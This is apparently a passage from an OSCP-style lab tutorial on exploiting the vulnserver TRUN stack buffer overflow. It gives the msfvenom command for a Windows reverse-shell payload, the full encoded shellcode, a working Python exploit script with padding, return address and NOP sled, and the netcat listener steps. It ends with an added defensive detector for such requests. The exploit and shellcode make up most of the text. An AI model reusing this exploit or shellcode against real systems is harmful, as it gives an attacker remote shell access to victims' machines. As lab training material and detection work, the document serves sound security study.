
    OSCP Security Technology - Generating Shellcode & Gaining Root

    Generate the shellcode (note: LHOST is the Kali Linux IP; `-b "\x00"` excludes the null byte, which would terminate the string in the vulnerable C buffer; `EXITFUNC=thread` lets the shell exit without killing the whole process):

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f c -a x86 --platform windows -b "\x00"
    


    "\xda\xcd\xd9\x74\x24\xf4\xbf\x1e\xa7\x4b\x98\x5a\x2b\xc9\xb1"
    "\x52\x31\x7a\x17\x83\xc2\x04\x03\x64\xb4\xa9\x6d\x64\x52\xaf"
    "\x8e\x94\xa3\xd0\x07\x71\x92\xd0\x7c\xf2\x85\xe0\xf7\x56\x2a"
    "\x8a\x5a\x42\xb9\xfe\x72\x65\x0a\xb4\xa4\x48\x8b\xe5\x95\xcb"
    "\x0f\xf4\xc9\x2b\x31\x37\x1c\x2a\x76\x2a\xed\x7e\x2f\x20\x40"
    "\x6e\x44\x7c\x59\x05\x16\x90\xd9\xfa\xef\x93\xc8\xad\x64\xca"
    "\xca\x4c\xa8\x66\x43\x56\xad\x43\x1d\xed\x05\x3f\x9c\x27\x54"
    "\xc0\x33\x06\x58\x33\x4d\x4f\x5f\xac\x38\xb9\xa3\x51\x3b\x7e"
    "\xd9\x8d\xce\x64\x79\x45\x68\x40\x7b\x8a\xef\x03\x77\x67\x7b"
    "\x4b\x94\x76\xa8\xe0\xa0\xf3\x4f\x26\x21\x47\x74\xe2\x69\x13"
    "\x15\xb3\xd7\xf2\x2a\xa3\xb7\xab\x8e\xa8\x5a\xbf\xa2\xf3\x32"
    "\x0c\x8f\x0b\xc3\x1a\x98\x78\xf1\x85\x32\x16\xb9\x4e\x9d\xe1"
    "\xbe\x64\x59\x7d\x41\x87\x9a\x54\x86\xd3\xca\xce\x2f\x5c\x81"
    "\x0e\xcf\x89\x06\x5e\x7f\x62\xe7\x0e\x3f\xd2\x8f\x44\xb0\x0d"
    "\xaf\x67\x1a\x26\x5a\x92\xcd\x89\x33\x9e\x15\x62\x46\x9e\x34"
    "\x2e\xcf\x78\x5c\xde\x99\xd3\xc9\x47\x80\xaf\x68\x87\x1e\xca"
    "\xab\x03\xad\x2b\x65\xe4\xd8\x3f\x12\x04\x97\x1d\xb5\x1b\x0d"
    "\x09\x59\x89\xca\xc9\x14\xb2\x44\x9e\x71\x04\x9d\x4a\x6c\x3f"
    "\x37\x68\x6d\xd9\x70\x28\xaa\x1a\x7e\xb1\x3f\x26\xa4\xa1\xf9"
    "\xa7\xe0\x95\x55\xfe\xbe\x43\x10\xa8\x70\x3d\xca\x07\xdb\xa9"
    "\x8b\x6b\xdc\xaf\x93\xa1\xaa\x4f\x25\x1c\xeb\x70\x8a\xc8\xfb"
    "\x09\xf6\x68\x03\xc0\xb2\x89\xe6\xc0\xce\x21\xbf\x81\x72\x2c"
    "\x40\x7c\xb0\x49\xc3\x74\x49\xae\xdb\xfd\x4c\xea\x5b\xee\x3c"
    "\x63\x0e\x10\x92\x84\x1b"
    

    Write the exploit script.

    nano exploit.py
    chmod +x exploit.py
    
    #!/usr/bin/env python3
    # Proof of concept for the vulnserver TRUN overflow. Converted from the
    # original Python 2 script to Python 3 byte strings; the bytes are the
    # msfvenom output shown above.
    import socket
    
    # windows/shell_reverse_tcp, encoded with \x00 excluded as a bad character
    shellcode = (
    b"\xda\xcd\xd9\x74\x24\xf4\xbf\x1e\xa7\x4b\x98\x5a\x2b\xc9\xb1"
    b"\x52\x31\x7a\x17\x83\xc2\x04\x03\x64\xb4\xa9\x6d\x64\x52\xaf"
    b"\x8e\x94\xa3\xd0\x07\x71\x92\xd0\x7c\xf2\x85\xe0\xf7\x56\x2a"
    b"\x8a\x5a\x42\xb9\xfe\x72\x65\x0a\xb4\xa4\x48\x8b\xe5\x95\xcb"
    b"\x0f\xf4\xc9\x2b\x31\x37\x1c\x2a\x76\x2a\xed\x7e\x2f\x20\x40"
    b"\x6e\x44\x7c\x59\x05\x16\x90\xd9\xfa\xef\x93\xc8\xad\x64\xca"
    b"\xca\x4c\xa8\x66\x43\x56\xad\x43\x1d\xed\x05\x3f\x9c\x27\x54"
    b"\xc0\x33\x06\x58\x33\x4d\x4f\x5f\xac\x38\xb9\xa3\x51\x3b\x7e"
    b"\xd9\x8d\xce\x64\x79\x45\x68\x40\x7b\x8a\xef\x03\x77\x67\x7b"
    b"\x4b\x94\x76\xa8\xe0\xa0\xf3\x4f\x26\x21\x47\x74\xe2\x69\x13"
    b"\x15\xb3\xd7\xf2\x2a\xa3\xb7\xab\x8e\xa8\x5a\xbf\xa2\xf3\x32"
    b"\x0c\x8f\x0b\xc3\x1a\x98\x78\xf1\x85\x32\x16\xb9\x4e\x9d\xe1"
    b"\xbe\x64\x59\x7d\x41\x87\x9a\x54\x86\xd3\xca\xce\x2f\x5c\x81"
    b"\x0e\xcf\x89\x06\x5e\x7f\x62\xe7\x0e\x3f\xd2\x8f\x44\xb0\x0d"
    b"\xaf\x67\x1a\x26\x5a\x92\xcd\x89\x33\x9e\x15\x62\x46\x9e\x34"
    b"\x2e\xcf\x78\x5c\xde\x99\xd3\xc9\x47\x80\xaf\x68\x87\x1e\xca"
    b"\xab\x03\xad\x2b\x65\xe4\xd8\x3f\x12\x04\x97\x1d\xb5\x1b\x0d"
    b"\x09\x59\x89\xca\xc9\x14\xb2\x44\x9e\x71\x04\x9d\x4a\x6c\x3f"
    b"\x37\x68\x6d\xd9\x70\x28\xaa\x1a\x7e\xb1\x3f\x26\xa4\xa1\xf9"
    b"\xa7\xe0\x95\x55\xfe\xbe\x43\x10\xa8\x70\x3d\xca\x07\xdb\xa9"
    b"\x8b\x6b\xdc\xaf\x93\xa1\xaa\x4f\x25\x1c\xeb\x70\x8a\xc8\xfb"
    b"\x09\xf6\x68\x03\xc0\xb2\x89\xe6\xc0\xce\x21\xbf\x81\x72\x2c"
    b"\x40\x7c\xb0\x49\xc3\x74\x49\xae\xdb\xfd\x4c\xea\x5b\xee\x3c"
    b"\x63\x0e\x10\x92\x84\x1b")
    
    # 2003 bytes of padding up to the saved return address, the 4-byte address
    # that overwrites it (little-endian), a 32-byte NOP sled, then the shellcode
    payload = b"A" * 2003 + b"\xaf\x11\x50\x62" + b"\x90" * 32 + shellcode
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    try:
        s.connect(('192.168.2.21', 9999))   # vulnserver on the target VM
        s.send(b'TRUN /.:/' + payload)
    except socket.error:
        print("check debugger")
    s.close()
    

    Start vulnserver on the target, open a netcat listener on LPORT on Kali, then run the exploit script.

    nc -nvlp 4444
    
    ./exploit.py
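The same request seen from the defending side, as an added example that is not part of the original post: a small Python 3 detector that inspects vulnserver-style `COMMAND argument` requests captured from the network and flags the structural signs of the overflow above (an oversized argument, a long run of one padding byte, a NOP sled, and non-printable bytes in what should be a text argument). The thresholds, the sample requests and all function names are constructed for this illustration; the stand-in byte range replaces the real encoded payload.

```python
import re

# Thresholds (assumed for this illustration; tune to the protocol in question)
MAX_ARG_LEN = 1024   # largest argument a legitimate client is expected to send
MIN_PAD_RUN = 256    # a run of one byte this long looks like overflow padding
MIN_NOP_RUN = 8      # shortest run of 0x90 (x86 NOP) worth reporting as a sled


def longest_run(data):
    """Return (byte_value, length) for the longest run of one repeated byte."""
    best_byte, best_len = None, 0
    i = 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i > best_len:
            best_byte, best_len = data[i], j - i
        i = j
    return best_byte, best_len


def nop_sled_len(data):
    """Length of the longest run of 0x90 bytes in the data (0 if none)."""
    return max((len(m) for m in re.findall(rb"\x90+", data)), default=0)


def nonprintable_count(data):
    """Number of bytes outside printable ASCII (0x20..0x7e)."""
    return sum(1 for b in data if b < 0x20 or b > 0x7e)


def inspect_request(request):
    """Split a 'COMMAND argument' request on the first space and report
    overflow indicators found in the argument."""
    cmd, _, arg = request.partition(b" ")
    findings = []
    if len(arg) > MAX_ARG_LEN:
        findings.append("oversized argument (%d bytes)" % len(arg))
    run_byte, run_len = longest_run(arg)
    if run_len >= MIN_PAD_RUN:
        findings.append("padding run of 0x%02x x %d" % (run_byte, run_len))
    sled = nop_sled_len(arg)
    if sled >= MIN_NOP_RUN:
        findings.append("NOP sled of %d bytes" % sled)
    bad = nonprintable_count(arg)
    if bad:
        findings.append("%d non-printable bytes in a text argument" % bad)
    return {
        "command": cmd.decode("ascii", "replace"),
        "arg_len": len(arg),
        "suspicious": bool(findings),
        "findings": findings,
    }


# Constructed samples: a benign TRUN request and one shaped like the buffer
# in the script above (padding, 4-byte address, NOP sled, then opaque bytes;
# a stand-in byte range is used instead of real shellcode).
BENIGN = b"TRUN /.:/hello"
OVERFLOW = (b"TRUN /.:/" + b"A" * 2003 + b"\xaf\x11\x50\x62"
            + b"\x90" * 32 + bytes(range(0xda, 0xff)))

if __name__ == "__main__":
    for req in (BENIGN, OVERFLOW):
        print(inspect_request(req))
```

Splitting only on the first space matters: encoded shellcode can legitimately contain 0x20 (the payload above does), so anything after the first separator is treated as one opaque argument. Any one of these findings on a plain-text service port is worth an alert; the combination of a kilobyte-scale single-byte run followed by a NOP sled is the classic stack-overflow shape and should be treated as an exploitation attempt rather than a malformed client.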
    


  • Original source: https://www.cnblogs.com/keepmoving1113/p/14942003.html